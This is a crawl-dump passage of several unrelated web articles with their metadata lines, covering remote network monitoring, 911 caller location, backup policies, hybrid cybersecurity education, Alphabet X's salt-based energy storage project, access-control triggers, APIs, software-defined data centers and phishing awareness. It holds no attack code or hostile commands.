associating IP addresses with physical locations. It also allows you to "drill-down" to lower-map levels, so you can get all the way down to a view of your equipment. If you have terminal servers or LAN accessible equipment at your sites, you can also associate that equipment with an icon within T/GFX to access that interface through the graphical interface, so you can truly control your whole network from within the master interface. As your network grows, you can't afford to simply respond to your sites when something goes wrong, and you certainly don't want to make trips to sites to fix trivial problems when you have real network issues. The right set of remote monitoring tools will make network maintenance more proactive and help you prevent equipment failures and network outages by responding intelligently to the problems that arise in your network. Alarm Monitor Remote You need to see DPS gear in action. Get a live demo with our engineers. Download our free Monitoring Fundamentals Tutorial. An introduction to Monitoring Fundamentals strictly from the perspective of telecom network alarm management. Have a specific question? Ask our team of expert engineers and get a specific answer! Sign up for the next DPS Factory Training! Whether you're new to our equipment or you've used it for years, DPS factory training is the best way to get more from your monitoring.Reserve Your Seat Today
<urn:uuid:db487d9e-e4a9-4bcd-8e17-27d2f8e3543d>
CC-MAIN-2022-40
https://www.dpstele.com/network-monitoring/remote/tool.php
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00533.warc.gz
en
0.936711
1,724
2.546875
3
The 911 emergency phone system is outdated. In 1874, Alexander Graham Bell invented the telephone, allowing speech to be transmitted electronically over wires. His invention swept the world and homes and businesses everywhere installed telephones to communicate. If you wanted to speak to someone, you called their home or business and asked to speak to them. When the 911 emergency call system was invented in 1968, most homes had fixed-location, landline telephones. Using caller ID and a database of home addresses, it was easy and automatic for the 911 dispatcher to get the physical address of the caller. Times have changed. People are permanently disconnecting their home landline phones at an astonishing rate. The old telephony model of calling a place has been replaced by calling a specific person, wherever they are at the moment, on their mobile phone. POTS goes up in smoke Mobile phones are everywhere and landlines are dying. Plain Old Telephone Service (POTS) is not only being disconnected by consumers – even phone companies like AT&T want to cut the cord. Less than 10 percent of the households in AT&T’s territory in Illinois have old-fashioned landlines. AT&T has petitioned the FCC to allow it to disconnect the 1.2 million landline phone customers it provides service for in the state, to help it move toward modern wireless telephony and Internet services. Phone companies wanting to exit the landline business is a growing national trend. AT&T has gotten similar legislation passed in 19 other states as well. The FCC estimates that over 70 percent of calls to 911 are from cell phones and that number is rising quickly. Mobile phones don’t have a fixed location, they move about. This simple fact causes a major problem for the 911 system is that the CALLER ID can no longer automatically provide the location of the caller to the 911 operator. Knowing the location of a cell tower is not the same as knowing the location of a person in trouble. To respond to an emergency, the police, fire or medics must know the physical address to go to. No address, no response. So it has become necessary for the 911 dispatcher to engage in questioning the caller to identify their location. This is by no means as easy as the old days, when the landline phone did not move and its location was perfectly known. While a dispatcher will ask location questions, often the person calling from a mobile phone may not even know where they are at the moment. They may be driving down a dark highway and see an accident. Or see a house on fire and not know even what town they are in. The Solution: 911 must embrace smartphone technology A multi-billion dollar, long time buildout is planned to modernize the 911 system. However, we should not need to wait! ELERTS mobile apps already can provide the location of the caller when a person presses ‘Call 911’ button in the app. Smartphones have excellent GPS location information which can be transmitted by mobile apps. Knowing the location of an emergency is critical to respond and render police, fire or medical services to those in peril. Providing an easy way for citizens to contact emergency operators is crucial for public safety. We must adapt our emergency services to better interact with the mobile-phone-using public. The more eyes and ears reporting safety and security concerns, the better. So, while we have to wait for that multi-billion dollar 911 infrastructure upgrade to come to fruition, we do have alternatives that work today. The next time you hear of a See Something Say Something app in your area, download it and help by being a part of creating a safer society.
<urn:uuid:5e089c55-2900-4dde-a942-46fbc3079b60>
CC-MAIN-2022-40
https://elerts.com/overcoming-limits-calling-911/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00533.warc.gz
en
0.953021
745
3.234375
3
A backup process is also known as a backup procedure and policy. It allows organizations to create the best backup strategy that will benefit them for a long time. If you want to enhance your organization’s process, you are in the right place. Here is everything you need to know about it to create the best process that will protect the organization from an incident of data loss. Backup Process Definition A backup process or procedure is an effective strategy to ensure the backup is recoverable and protected. It also provides minimal downtime and that data loss does not happen in the first place. After all, uptime and recovery are the most critical aspects. All companies have a backup process they must create and follow. It allows them to secure everything important and get the most out of their data storage and backup systems. Top Tips To Create An Effective Backup Process If you are looking to create the most effective backup process for your organization, here are the top tips you must implement: - Create Consistent Policies Your backup process must have consistent policies across all devices and servers where your backup is stored. That is because if your backup is stored on various devices, you need consistent policies to ensure it is safe. Therefore, every team member must sit down and consult with one another to create the best policies. Doing this will ensure that everyone understands the rules and is consistent across all departments and processes. So, be sure to ensure consistency with your policies. - Clear Policies And Easy Implementation Your backup process policies must be clear and easy to implement. That is because everyone must understand the policy and its reason for existence. In addition, backup has important data, which is why the entire staff must recognize its importance. The data backup processes must not sit on the shelf. Instead, organizations need to update them with consistency and review it from time to time with the staff. Then, it will guarantee that everyone understands the process. - Create Metrics Finally, you must create metrics for your backup process. That is because you need to review and check if everyone is following the policies you created. For example, various backup software with automatic policy management features helps in this regard that you can use. You must test your backup processes and recovery plans. Once you do, you can easily follow the process you set in case there is a data loss. That was your complete guide to understanding backup processes. They are critical to all organizations creating large volumes of data and need a proper solution for backup and storage. The process policies must be clear, easy to implement, and a review process that allows you to test and understand your policies even better. So, follow these guidelines and create the best backup process for your organization. Recent blog posts Cloud Backup Services: Everything You Need to Know The Simplest Way to Migrate Project Sites to Different Site Collections How to Restore Smartsheet Project to a Previous Version Project Online Reporting: A Beginner’s Guide to Power BI Reporting Cross Platform Integration: Common Challenges and Tips to Make It Work
<urn:uuid:df64ca22-4a09-4180-a042-b0f182fc692c>
CC-MAIN-2022-40
https://fluentpro.com/glossary/backup-process/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00533.warc.gz
en
0.931484
629
2.53125
3
Cybersecurity education faces the need to quickly adapt to a hybrid learning model. The demand for expert cybersecurity professionals is expected to increase by over 350% this year alone, with even bigger increases possible next year. Without hybrid learning, it will be nearly impossible to sufficiently train enough professionals to meet this demand. In this article, we will dive into hybrid learning and the technologies and practices that make it work, so you can empower your students to rise to the top of the cybersecurity field. Hybrid learning is an educational approach in which some teaching occurs in a traditional classroom setting, while other information is provided online. Students may access some or most of the content remotely, and can typically take part in discussions during live lectures even if they can’t be physically present. According to Penn State University, this approach reduces the time students must spend in a physical classroom by shifting most of the content delivery to an online learning environment. This makes hybrid learning efficient for cybersecurity students who need more than you can provide in the confines of a lecture. Is There One Standard Hybrid Learning Model? Many people assume that hybrid learning only exists to give some students the option to learn at home. Although this is one type of hybrid approach, it is only one of many. The Online Learning Consortium breaks down computer-aided learning programs into five primary categories: - Classroom-based programs: These programs mirror a traditional learning environment with scheduled, in-person classroom sessions. Classroom hours can be used for lectures, lab activities, workshops, field, trips, and other educational activities. Computer-based and online learning tools can supplement face-to-face instruction during classroom sessions. - Synchronous distributed programs: These programs enable both in-classroom and remote students to participate in the same learning activities at the same time. This gives students who cannot physically attend classroom sessions the ability to learn in real time via a web conferencing tool. Remote students must still be available at scheduled class times to interact, but recordings can help students catch up if they miss a session. - Web-enhanced program: This type of course typically requires students to engage with some of the learning materials online as well as in the classroom. Online content usually makes up 20% or less of the total material. - Blended hybrid classroom program: These programs feature online learning activity designed to replace some face-to-face classroom sessions – but not all. For example, a classroom-based program that requires three days a week of in-class time might only involve one classroom session a week in a blended hybrid program. - Blended hybrid online program – Most of the learning and course work in these programs happens online. These programs typically require limited face-to-face activities, such as labs or workshops. These activities separate blended online courses from true “online programs” because students cannot be location-independent. What are the Benefits of Hybrid Learning? As hybrid teaching models and technology evolve, the benefits of hybrid learning programs are becoming more clear: - Hybrid environments promote active learning. Very few students enjoy the thought of taking a course made up of nothing but classroom lectures. Even if the material is interesting, the one-way delivery of lecture-based teaching leaves many people unengaged. Low engagement means low retention. Active learning, though, immerses students in the learning experience by engaging them in meaningful discussions and activities. This allows students to remember information better, and to apply what they’ve learned in a wide range of scenarios. Group web conference discussions, online surveys, live Q&As, and other online activities provide active learning opportunities. Students can learn more, and synthesize information better, than they ever could from a lecture alone. - Students can learn critical information to enhance their skills and knowledge without disrupting their daily lives. Current and future cybersecurity professionals need to stay on top of the latest information in order to excel in their careers. Still, students may be working at a job, taking care of children, and handling dozens of non-education tasks every day. Hybrid learning lets them manage their lives without falling behind. - Hybrid cybersecurity training programs can meet the increased demand. As a cybersecurity trainer, professor, or course facilitator, you should be looking for ways to help the increasing number of people entering the cybersecurity field. Hybrid training gives students the advantage of learning in the classroom, as well as through practical applications and exercises in an online environment. How Can You Create an Effective Hybrid Learning Environment? Just as not all hybrid learning programs follow the same format, not all programs are equally effective. A poorly constructed hybrid learning program can leave students feeling confused and unprepared for the challenges of the working world. An effective hybrid environment, though, can amplify retention, synthesis, and use of the content to solve everyday cybersecurity challenges. Here are some ways you can create a hybrid program that is as effective as possible for your students: - Determine goals for the hybrid program. You’ll want to carefully outline your goals for yourself and your students throughout the class, so that everyone knows what is expected. Break down large goals into smaller goals that each correspond with an assignment, working backwards to ensure that the curriculum supports your overall aim. - Map your students’ journey. Once you have determined the overall goals and broken them down into assignments, you’ll need to create a way to chart that journey for each student. You can use charts, graphs, lists, or other media to outline each lesson module, along with corresponding online media, outside reading, or other assignments. Putting your program content into a visual format can help you identify issues with consistency, flow, and content completeness. - Identify the goals and sub-goals that require in-person meeting time. Chances are, most of the material will translate well to an online environment, where students can absorb and interact with the content remotely. Sometimes, though, certain lessons and activities should be done in-person. Some examples include: - Outlining course or program expectations and assigning individual responsibilities - Live group brainstorming sessions - Creating a trust-based learning environment - Presentations and activities involving immediate feedback - Identify the goals and sub-goals that can be achieved through online learning. After you have identified the goals and activities that require in-person classroom time, you’ll need to ensure that the rest of the learning content is available online. There are many types of online learning resources you can effectively deliver in an online environment: - Self-directed assessments and activities - Self-paced learning modules - Asynchronous class discussions, which can happen online over the course of days or weeks - Long-form written assignments, such as critical analysis responses to real-world example problems - Instructional video content - Livestream video content - Audio recordings - Create and set up your program content. After you’ve matched your goals to in-person and online activities, you’ll need to create the content that you’ll distribute through these channels. As you’re preparing to create content, be sure to look through your own archives, or those of your educational institution, for existing content. You may discover content you can repurpose or adapt to classroom or online learning, which saves time and lets you implement your program sooner. Also, look to group discussions for inspiration – in these conversations, you’ll likely find questions, comments, and insights that spark a better understanding of what your students need. Once you’ve created the content, be sure to review it for consistency and logical flow. - Do a “beta test” the first time. In a perfect world, the online portion of your program would work flawlessly the very first time your students see it. Unfortunately, this is rarely the case. Even the most carefully designed programs come with latent flaws, and it will take some time to correct errors as you discover them. Running a “beta test” with a handful of students or colleagues can help relieve the stress of publishing the online portion of your hybrid learning program. This arrangement benefits everyone – beta users get early access to valuable materials, and you get real-time, honest feedback to increase the quality and effectiveness of your hybrid learning program. - Take advantage of technology to enhance hybrid learning. In the early days of the Internet, the idea of blending in-classroom instruction with online learning seemed like a promising but cumbersome task. Technology limitations made it difficult to implement hybrid programs with any significant degree of success. Today, though, there are a wide range of tech tools available to help make your hybrid program run seamlessly Here are just a few: - Plug-and-play webcams – although you might have a built-in webcam on your laptop, the low resolution and overall poor quality of most of these webcams make them substandard choices for online learning. A simple USB webcam can open up a new world of clarity and visual control. Better resolution isn’t the only benefit of choosing an external webcam – a bigger lens means better clarity, particularly when lighting isn’t perfect. Some webcams also come with tilt, pan, zoom, and other features that can enhance your presentations. TechLearning lists the highest rated webcams for educators and students. - Video conferencing software – if you want your students to be engaged in the online part of your hybrid learning program, you’ll want to be able to interact with them through online video conferencing. This type of software also makes it possible for students to attend live lectures remotely. There are many video conferencing software providers, each with unique features, benefits, limitations, and price points. Most are available on a subscription basis, with “pro level” pricing tiers that give users advanced features, such as cloud storage and livestreaming. Techradar reviews the top platforms based on these factors. - Online conversation apps – getting students to learn means keeping them engaged, and that means making it easy for them to keep the conversation going. There are many online apps you can use to spark fresh conversation and keep your students using your learning resources. For example, Sli.do empowers remote students to ask questions in real time, answer polls, and feel truly engaged in the module content. Dyknow shares other popular tools designed to drive student engagement through ongoing, organic conversation. - Done-for-you online training platforms – creating content and managing an online learning environment for your hybrid learning program can be overwhelming. Add in the fact that cybersecurity is a rapidly changing industry where established wisdom can become obsolete almost overnight, and getting your students the most accurate training possible can be a serious challenge. Some educators in the cybersecurity industry have turned to done-for-you online training platforms like, such as our Cyber Arcade . These solutions take the time, frustration, and pressure out of delivering timely, critical training to current and future cybersecurity pros. Online training platforms eliminate the guesswork of knowing what each of your cybersecurity program students needs out of online training. Cybint Security Labs is designed to enhance your existing curriculum with practical, real-world exercises and training. By immersing in real-life scenarios, students can develop the decision-making skills to succeed in their careers. There are more than 100 exercises in all – each one is carefully curated by a team of professionals with extensive experience in the cybersecurity industry. They cover a wide range of topics that are critical in today’s world, such as: - Network admin and application security - Incident handling and response - Ethical hacking - Malware analysis - Threat intelligence - Risk management - And many others. Check out our Cyber Arcade today to find out how simple done-for-you online cybersecurity training can be. You’ll have the peace of mind of knowing your students have all the knowledge they need, right at their fingertips.
<urn:uuid:4c80abe1-d48f-4d6b-a4d2-96ee6b9ae436>
CC-MAIN-2022-40
https://www.cybintsolutions.com/how-to-enhance-hybrid-learning-through-technology/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00533.warc.gz
en
0.932697
2,470
3.125
3
Mark Bergen (Bloomberg) — Alphabet Inc.’s secretive X skunk works has another idea that could save the world. This one, code named Malta, involves vats of salt and antifreeze. The research lab, which hatched Google’s driverless car almost a decade ago, is developing a system for storing renewable energy that would otherwise be wasted. It can be located almost anywhere, has the potential to last longer than lithium-ion batteries and compete on price with new hydroelectric plants and other existing clean energy storage methods, according to X executives and researchers. The previously undisclosed initiative is part of a handful of energy projects at X, which has a mixed record with audacious “moonshots” like Google Glass and drone delivery. Venture capitalists, and increasingly governments, have cut funding and support for technology and businesses built around alternatives to fossil fuels. X’s clean-energy projects have yet to become hits like its driverless cars, but the lab isn’t giving up. “If the moonshot factory gives up on a big, important problem like climate change, then maybe it will never get solved,” said Obi Felten, a director at X. “If we do start solving it, there are trillions and trillions of dollars in market opportunity.” She runs The Foundry, where a Malta team of fewer than 10 researchers is testing a stripped-down prototype. This is the part of X that tries to turn experiments in science labs into full-blown projects with emerging business models, such as its Loon internet-beaming high-altitude balloons. Malta is not yet an official X project, but it has been “de-risked” enough that the team is now looking for partners to build, operate and connect a commercial-sized prototype to the grid, Felten said. That means Alphabet may team up or compete with industrial powerhouses like Siemens AG, ABB Ltd. and General Electric Co. X is stepping into a market that could see about $40 billion in investment by 2024, according Bloomberg New Energy Finance. Roughly 790 megawatts of energy will be stored this year and overall capacity is expected to hit 45 gigawatts in seven years, BNEF estimates. Existing electrical grids struggle with renewable energy, a vexing problem that’s driving demand for new storage methods. Solar panels and wind farms churn out energy around midday and at night when demand lulls. This forces utilities to discard it in favor of more predictable oil and coal plants and more controllable natural gas “peaker” plants. In the first half of this year, California tossed out more than 300,000 megawatts produced by solar panels and wind farms because there’s no good way to store it. That’s enough to power tens of thousands of homes. About 4 percent of all wind energy from Germany was jettisoned in 2015, according to Bloomberg New Energy Finance. China throws out more than 17 percent. Felten is particularly excited about working with companies in China, a voracious energy consumer — and a country where almost all Google web services are banned. Before that happens, the Malta team has to turn what is now an early test prototype in a warehouse in Silicon Valley into a final product that can be manufactured and is big and reliable enough for utilities to plug it into electricity grids. In renderings, viewed by Bloomberg News, the system looks like a miniature power plant with four cylindrical tanks connected via pipes to a heat pump. X says it can vary in size from roughly the dimensions of a large garage to a full-scale traditional power plant, providing energy on demand to huge industrial facilities, data centers or storage for small wind farms and solar installations. The system mixes an established technique with newly designed components. “Think of this, at a very simple level, as a fridge and a jet,” said Julian Green, the product manager for Malta. Two tanks are filled with salt, and two are filled with antifreeze or a hydrocarbon liquid. The system takes in energy in the form of electricity and turns it into separate streams of hot and cold air. The hot air heats up the salt, while the cold air cools the antifreeze, a bit like a refrigerator. The jet engine part: Flip a switch and the process reverses. Hot and cold air rush toward each other, creating powerful gusts that spin a turbine and spit out electricity when the grid needs it. Salt maintains its temperature well, so the system can store energy for many hours, and even days, depending on how much you insulate the tanks. Scientists have already proven this as a plausible storage technique. Malta’s contribution was to design a system that operates at lower temperatures so it doesn’t require specialized, expensive ceramics and steels. “The thermodynamic physics are well-known to anyone who studied it enough in college,” Green said. “The trick is doing it at the right temperatures, with cheap materials. That is super compelling.” X declined to share exactly how cheap its materials are. Thermal salt-based storage has the potential to be several times cheaper than lithium-ion batteries and other existing grid-scale storage technologies, said Raj Apte, Malta’s head engineer. German engineering firm Siemens is also developing storage systems using salt for its solar-thermal plants. But lithium-ion battery prices are falling quickly, according to Bloomberg New Energy Finance. And Malta must contend with low oil and natural gas prices, a market reality that’s wiped out several companies working on alternatives to fossil fuels. “It could potentially compete with lithium-ion,” said Bloomberg New Energy Finance analyst Yayoi Sekine. “But there are a lot of challenges that an emerging technology has to face.” One hurdle is convincing energy incumbents to put capital into a project with potential returns many years down the road. Alphabet has the balance sheet to inspire confidence, with $95 billion in cash and equivalents. Yet the tech giant has a recent history of retreating from or shutting experimental projects that stray from its core areas of high-power computing and software. Robert Laughlin, a Nobel prize-winning physicist whose research laid the foundation for Malta, is now a consultant on the project. He met X representatives at a conference a few years ago. They discussed the idea, and the lab ultimately decided to fund the project and build a small team to execute it. Laughin has signed off on the team’s designs, and he said his theories have been working with the prototype. Laughlin believes X is more committed than previous potential backers. He first pitched the idea as his own startup, taking it to luminary tech investors including Khosla Ventures and Peter Thiel’s Founders Fund. They passed, according to the scientist, because they didn’t want to deal with the tougher demands of a conservative energy industry that will have to buy and use the system in the end. “What we’re talking about here is engines and oil companies — big dinosaurs with very long teeth,” said Laughlin. That’s “above the pay grade of people out here.” A representative from Founders Fund declined to comment. Khosla didn’t respond to requests for comment. X won’t say how much it has invested so far, but it’s enough for Laughlin. “A blessing came out of the sky,” he said. “X came in and took a giant bite out of this problem.”
<urn:uuid:a4997760-ecb7-4f3f-b22a-24a3e54c273c>
CC-MAIN-2022-40
https://www.datacenterknowledge.com/energy/alphabet-wants-fix-clean-energys-storage-problem-salt
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00533.warc.gz
en
0.956859
1,582
2.515625
3
What is the difference between triggers, procedures and BluSKY Rules? A transaction is an event detected by the EP controller and logged for reporting to the host. The Mercury definition of a trigger is the occurrence of a specified transaction in the system. Triggers execute to invoke procedures. The definition of procedures is a sequence of one or more actions performed when the procedure is called upon to execute. Each action represents a control command such as relay control or door unlock. A BluSKY rule is similar to a trigger and procedure in so far as when an event occurs and it is reported to BluSKY by the EP controller, it will run a specified action in BluSKY, which can include calling a procedure in the controller. A BluSKY Rule is run from BluSKY, where Triggers and Procedures are configured in BluSKY, but are sync'd to the EP controller where they are run.
<urn:uuid:6fd7d586-1e24-4d04-a965-8d346a51e36d>
CC-MAIN-2022-40
https://knowledge.blub0x.com/FAQs/What_is_the_difference_between_triggers%2C_procedures_and_BluSKY_Rules
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00533.warc.gz
en
0.953608
194
2.671875
3
APIs are the primary means by which applications, firmware and online processes share data. They make life easier for developers and underpin many of the services we rely on every day, from social networks to online banks. What is an API? An API or Application Programming Interface sets out the kind of demands that one system can make of another. This includes the format in which those demands should be made. It could, for example, be used to determine how a human resources platform puts in a request for salary data from an accounting system. Equally, it could control how wearables share workout data with smartphones or writes it to the cloud. How API’s make easy work of integrations Unless they’re produced by the same developer, there’s no reason why any two systems should be coded to be compatible. But by making various data points accessible in response to an API call, the accounting system in our above example can surface tagged but otherwise plain-language data for use in third-party processes without itself understanding how those processes work. This saves the developers of either system coding import or export tools for every conceivable third-party service. Instead, they can focus on optimising their own platform. An API allows developers to expose a subset of their data and leave third parties to work out how they want to use it. “It can be helpful to think of the API as a way for different apps to talk to one another,” says Mailchimp. But it’s equally important to remember that these ‘apps’ aren’t restricted to traditional software. APIs can also be used to interrogate hardware to return. For example, the state of an IoT device, whether a Wi-Fi-connected lightbulb is on or off or the temperature detected by a thermostat. According to the Kafka website, 80% of all Fortune 100 companies use Kafka. One of the biggest reasons for this is that it fits in well with mission-critical applications that require the use of APIs in cloud agnostic environments. Find out how in this free download. What is an API key? Some data is sensitive. Other data is valuable. Systems that provide an API interface frequently want to restrict access in such scenarios to either authorised or paying users. There are several means by which they can do this, including passwords and filtering on attributes like location or a device’s MAC address. However, using an API key is among the most common. “An API key can act as a secret authentication token as well as a unique identifier,” notes Last Call. “Typically, the key will come with a set of access rights for the API that it is associated with.” How API keys restrict access A key is a unique code that identifies a particular project or application, which must be supplied as part of the API call. Doing so allows the service to track which user or which process is accessing the API interface, so it can detect and prevent abuse, or accurately bill for its data. For example, a weather service that makes its data available via an API may have implemented a tiered pricing structure. A free tier allowing one call every hour, two paid tiers allowing one call every minute and an unlimited number of calls. By assigning API keys to its subscribers the weather provider can cap the number of valid updates provided in each instance in accordance with the subscriber’s chosen tier. Why API keys aren’t used specifically for security API keys are not a security tool in their own right. A subscriber in our example weather service’s ‘unlimited’ plan, could share her key with a non-paying user. The non-paying user would enjoy the same benefits unless the weather service itself had implemented additional validation and security protocols. Keys are therefore best thought of as a means of tracking resource use and, if applicable, using this to administer a granular pricing model. What is an API call? An API call is a line of code that bundles the API key (if applicable) with the location of the data the project wants to retrieve and any applicable variables. It can look much like a web address, as used in a browser. The structure of an API call The call itself consists of several parts. The most important is the endpoint. This is the location of the resource being requested, plus any relevant variables like the key and the fields required. If properly structured, this will be sufficient for the API gateway to return a human-readable, tagged array drawn from the API owner’s data. How API calls can be used APIs can also be used to send data, as well as retrieve it, in which case the variables that comprise the API call will be received by the API gateway and handed off to an internal system for storage or manipulation. As well as the endpoint, an API call may therefore specify: - whether it is a request for data - a submission of new data - an amendment to data already in place. What is an API gateway? The first device to encounter an incoming API call is the API gateway which, as described by RedHat, “sits between a client and a collection of backend services”. It interprets the contents of the call, identifies the resources required to satisfy it, and delivers a response. This response could be a batch of data, a confirmation that incoming data has been received or an error message. API errors can occur if the limits of an API key have been exceeded or the user is not authorised amongst other scenarios. How does an API Gateway work? The gateway acts as a junction between external user calls and the internal system of the API owner. It, therefore, provides a consistent interface and a predictable endpoint for external users, even if the back end, which manages the data being requested or written, changes over time. This gives developers the ability to maintain their core services in whichever manner best fits their operating model. Thus, updated documentation need only be provided to end-users if the parameters expected by the gateway change. What is API testing? It’s important to ensure that every part of a system is thoroughly tested and verified, and that ongoing changes are subjected to similar scrutiny. This is as true for an API as it is for the visible interface and the hidden back-end. Without adequate testing, there’s no certainty that requests will be correctly answered. Additionally, incoming data received by the API may not be accurately parsed and acted upon. As explained by SmartBear, API testing “generally consists of… requests to a single or sometimes multiple API endpoints [to] validate the response” and emphasizes “testing of business logic, data responses and security, and performance bottlenecks”. These latter points are particularly pertinent. Even if the data handling is accurate, undetected performance issues could cause a service to loop or stall as they consume excessive resources in responding to a call. This can put all internal and external processes that rely on an API at risk. Related Case Studies Mitigating Tech Resourcing Challenges with Highly Skilled Offshore Talent Discover how a global B2B media business, with over £400 million in annual turnover dealt with the challenge of tight deployment and development timelines with little room for recruitment or onboarding. High-Speed Machine Learning Image Processing and Attribute Extraction for Fashion Retail Trends A world-leading authority on forecasting consumer and design trends had the challenge of collecting, aggregating and reporting on millions of fashion products spanning multiple categories and sub-categories within 24 hours of them being published online.
<urn:uuid:9ae96fad-1600-4cba-92ad-90a728aa0fcb>
CC-MAIN-2022-40
https://www.meritdata-tech.com/resources/blog/digital-engineering-solutions/what-is-an-api/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00533.warc.gz
en
0.927516
1,580
3.5
4
IT Infrastructure Management Services What is a software-defined data center? Virtualization, automation, and the use of infrastructure as a service (IaSS) has led to the new data center standard: the software-defined data center (SDDC), in which software becomes the focus over hardware. While software plays the key role in SDDCs, hardware is still required. Most hardware in SDDCs looks quite different from hardware in traditional environments (HP, IBM, EMC, and Dell, among others). Whereas legacy data centers have lots of proprietary hardware to manage myriad devices, an SDDC uses mostly commodity hardware (available from traditional vendors like Dell and HPE, or from other players like Super Micro and Quanta, among others). With SDDCs, a company can operate a data center with fewer people. The reason is simple, SDDCs eliminate traditional resource islands in favor of the new software-powered matrix that makes the software layer responsible for everything.
<urn:uuid:aff3e317-4e20-4774-8162-842111fa6cd7>
CC-MAIN-2022-40
https://www.hcltech.com/technology-qa/what-software-defined-data-center
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00733.warc.gz
en
0.92835
202
3.09375
3
Phishing Awareness: How Does It Happen And How To Prevent It Why Do Criminals Use A Phishing Attack? What’s the biggest security vulnerability in an organization? Whenever they want to infect a computer or gain access to important information like account numbers, passwords, or PIN numbers, all they have to do is ask. Phishing attacks are commonplace because they are: - Easy to do – A 6-year old child could perform a phishing attack. - Scalable – They range from spear-phishing attacks that hit one person to attacks on an entire organization. - Very effective – 74% of organizations have experienced a successful phishing attack. - Gmail account credentials – $80 - Credit card pin – $20 - Online bank credentials for accounts with at least $100 in them – $40 - Bank accounts with at least $2,000 – $120 You’re probably thinking, “Wow, my accounts are going for the bottom dollar!” And this is true. There are other types of accounts that go for a much higher price tag because they are easier to keep money transfers anonymous. Accounts that hold crypto are the jackpot for phishing scammers. The going rates for crypto accounts are: - Coinbase – $610 - Blockchain.com – $310 - Binance – $410 There are also other non-financial reasons for phishing attacks. Phishing attacks can be used by nation-states to hack into other countries and mine their data. Attacks can be for personal vendettas or even to destroy the reputations of corporations or political enemies. The reasons for phishing attacks are endless… How Does A Phishing Attack Start? A phishing attack usually starts with the criminal coming right out and messaging you. They may give you a phone call, an email, an instant message, or an SMS. They could claim to be someone who is working for a bank, another company you do business with, a government agency, or even pretending to be someone in your own organization. A phishing email might ask you to click on a link or download and execute a file. You may think it’s a legitimate message, click the link inside their message, and log in to what appears to be the website from the organization you trust. At this point the phishing scam is complete. You’ve handed over your private information to the attacker. How To Prevent A Phishing Attack The main strategy to avoid phishing attacks is to train employees and build organizational awareness. Many phishing attacks look like legitimate emails and can pass through a spam filter or similar security filters. At first glance, the message or the website might look real using a known logo layout, etc. Luckily, detecting phishing attacks is not so difficult. The first thing to look out for is the sender’s address. If the sender address is a variation on a website domain that you may be used to, you may want to proceed with caution and not click anything in the email body. You can also look at the website address where you’re redirected if there are any links. To be safe, you should type the address of the organization you want to visit in the browser or use browser favorites. Watch out for links that when hovered over shows a domain that is not the same as the company sending the email. Read the content of the message carefully, and be skeptical of all messages asking you to submit your private data or verify information, fill out forms, or download and run files. Also, don’t let the content of the message fool you. Attackers often try to scare you to get you to click on a link or reward you to get your personal data. During a pandemic or national emergency, phishing scammers will take advantage of people’s fears and use the content of the subject line or message body to scare you into taking action and clicking a link. Also, check for bad spelling or grammar errors in the email message or website. Another thing to keep in mind is that most trusted companies will not usually ask you to send sensitive data via web or mail. That’s why you should never click on suspicious links or provide any sort of sensitive data. What Do I Do If I Receive A Phishing Email? If you receive a message that appears like a phishing attack, you have three options. - Delete it. - Verify the message content by contacting the organization through its traditional channel of communication. - You can forward the message to your IT security department for further analysis. Your company should already be screening and filtering the majority of suspicious emails, but anyone can become a victim. Unfortunately, phishing scams are a growing threat on the internet and the bad guys are always developing new tactics to get through to your inbox. Keep in mind that in the end, you’re the last and most important layer of defense against phishing attempts. How To Stop A Phishing Attack Before It Happens Since phishing attacks rely on human error to be effective, the best option is to train people in your business on how to avoid taking the bait. This doesn’t mean that you have to have a big meeting or seminar on how to avoid a phishing attack. There are better ways to find gaps in your security and improve your human response to phishing. 2 Steps You Can Take To Prevent A Phishing Scam A phishing simulator is software that allows you to simulate a phishing attack on all of the members of your organization. Phishing simulators typically come with templates to help disguise the email as a trusted vendor or mimic internal email formats. Phishing simulators don’t just create the email, but they help set up the fake website that the recipients will end up entering their credentials if they don’t pass the test. Rather than scolding them for falling into a trap, the best way to handle the situation is to provide information on how to assess phishing emails in the future. If someone fails a phishing test, it’s best to just send them a list of tips on spotting phishing emails. You can even use this article as a reference for your employees. Another major benefit of using a good phishing simulator is that you can measure the human threat in your organization, which is often hard to predict. It can take up to a year and a half to train employees to a safe level of mitigation. It’s important to choose the right phishing simulation infrastructure for your needs. If you are doing phishing simulations across one business, then your task will be easier If you are an MSP or MSSP, you may need to run phishing tests across multiple businesses and locations. Opting for a cloud-based solution would be the best option for users running multiple campaigns. Many phishing simulators come in the traditional Saas model and have tight contracts associated with them, but GoPhish on AWS is a cloud-based service where you pay at a metered rate rather than a 1 or 2-year contract. Step 2. Security Awareness Training A key benefit of giving employees security awareness training is protecting them from identity theft, bank theft, and stolen business credentials. Security awareness training is essential to improve employees’ ability to spot phishing attempts. Courses can help train staff to detect phishing attempts, but only a few focus on small businesses. It can be tempting for you as a small business owner to cut the costs of a course by sending some Youtube videos about security awareness… but staff rarely remembers that type of training for more than a few days. Hailbytes has a course that has a combination of quick videos and quizzes so you can track your employees’ progress, prove that security measures are in place, and massively cut your chances of suffering a phishing scam. If you are interested in running a free phishing simulation to train your employees, head to AWS and check out GoPhish! It’s easy to get started and you can always reach out to us if you need help getting set up.
<urn:uuid:29d63941-85b9-4167-b705-96f3b3f0f483>
CC-MAIN-2022-40
https://hailbytes.com/phishing-awareness-in-2022-how-does-it-happen-and-how-to-prevent-it/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00733.warc.gz
en
0.929107
1,722
3.03125
3
